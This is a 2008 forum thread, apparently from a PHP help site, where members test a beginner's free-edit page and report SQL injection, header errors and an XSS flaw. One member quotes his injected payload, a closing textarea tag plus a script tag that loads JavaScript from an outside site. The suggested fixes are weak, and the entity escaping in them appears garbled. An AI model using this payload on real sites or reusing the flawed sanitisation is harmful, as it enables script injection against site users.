CammyD Posted February 28, 2008 Share Posted February 28, 2008 Hi all. I Finished off my first full script. It is a free edit page. Could you guys test it out? http://www.cambiker.com/talk/index.php So far i have put some basic bbcode in, but i am going to add some more. Link to comment Share on other sites More sharing options...
shlumph Posted February 28, 2008 Share Posted February 28, 2008 When I hit GO: Warning: Cannot modify header information - headers already sent by (output started at /home/sites/cambiker.com/public_html/talk/index.php:4) in /home/sites/cambiker.com/public_html/talk/index.php on line 220 IMPORTENT! PLEASE DO NOT TYPE ' INTO THE BOX, OR IT WILL BREAK! LOL, that's not good. It's basically telling everyone to try an SQL injection. Look at the information on this page, and try and implement something that will not allow this: http://www.php.net/manual/en/function.addslashes.php Link to comment Share on other sites More sharing options...
CammyD Posted February 28, 2008 Author Share Posted February 28, 2008 The ' just deletes the contents of the mysql field. Nothing harmful Link to comment Share on other sites More sharing options...
helraizer Posted February 28, 2008 Share Posted February 28, 2008 The main problem is when you press Go! it says this: Warning: Cannot modify header information - headers already sent by (output started at /home/sites/cambiker.com/public_html/talk/index.php:4) in /home/sites/cambiker.com/public_html/talk/index.php on line 220 Link to comment Share on other sites More sharing options...
CammyD Posted February 28, 2008 Author Share Posted February 28, 2008 I am trying to fix that right now Link to comment Share on other sites More sharing options...
helraizer Posted February 28, 2008 Share Posted February 28, 2008 I am trying to fix that right now Cool cool. If you have any trouble post the code, we'll try and help. Link to comment Share on other sites More sharing options...
CammyD Posted February 28, 2008 Author Share Posted February 28, 2008 Done and Done. Ready for testing. I had a code that is meant to redirect back to main part, but it didn't work. Link to comment Share on other sites More sharing options...
helraizer Posted February 28, 2008 Share Posted February 28, 2008 The site is protected on the main viewing of the page but now on editing there is a big XSS flaw. I was able to inject Javascript from my website, which could be potentially very bad for you. Sam Link to comment Share on other sites More sharing options...
kts Posted February 28, 2008 Share Posted February 28, 2008 Tried to test it out but got this... Vunerable - Potentially Pwned This is an example of XSS, you need to protect against this or your site could be completely and utterly pwned. That is all! Ciao! uh oh! hehehehe looks like you got work to do Link to comment Share on other sites More sharing options...
helraizer Posted February 28, 2008 Share Posted February 28, 2008 Tried to test it out but got this... Vunerable - Potentially Pwned This is an example of XSS, you need to protect against this or your site could be completely and utterly pwned. That is all! Ciao! uh oh! hehehehe looks like you got work to do Told you there was a flaw. =P He can easily fix it by taking the "</textarea><script src=http://www.helraizer.co.uk/xss1.js></script>" out of the code. Link to comment Share on other sites More sharing options...
helraizer Posted February 28, 2008 Share Posted February 28, 2008 You should word wrap comments. If you look now the comments area is really wide because I said this thisisareallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallylongcommentforyou,reallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreallyreally reallyreallyreallyreallyreallyreallyreallyreallylong without any spaces and it broke the formatting. Sam Link to comment Share on other sites More sharing options...
CammyD Posted February 29, 2008 Author Share Posted February 29, 2008 OK guys. I need some help with the protecting of the site. Please help! Link to comment Share on other sites More sharing options...
helraizer Posted February 29, 2008 Share Posted February 29, 2008 To protect against the XSS you can use preg_replace. preg_replace("/textarea/i","",$textarea); // so if anyone uses the work textarea in the textarea (comment) it will delete the word so if they used </textarea> it'd just give </> you can also use preg_replace for other things like preg_replace("/</","<",$textarea); preg_replace("/>/",">",$textarea); which should change </script> to </script> which will render XSS not possible. Link to comment Share on other sites More sharing options...
agentsteal Posted February 29, 2008 Share Posted February 29, 2008 Cross Site Scripting: There is Cross Site Scripting if the message contains </textarea>code. Link to comment Share on other sites More sharing options...
dbillings Posted March 18, 2008 Share Posted March 18, 2008 The page now redirects via a javascript back to PHPFREAKS. Link to comment Share on other sites More sharing options...
Recommended Posts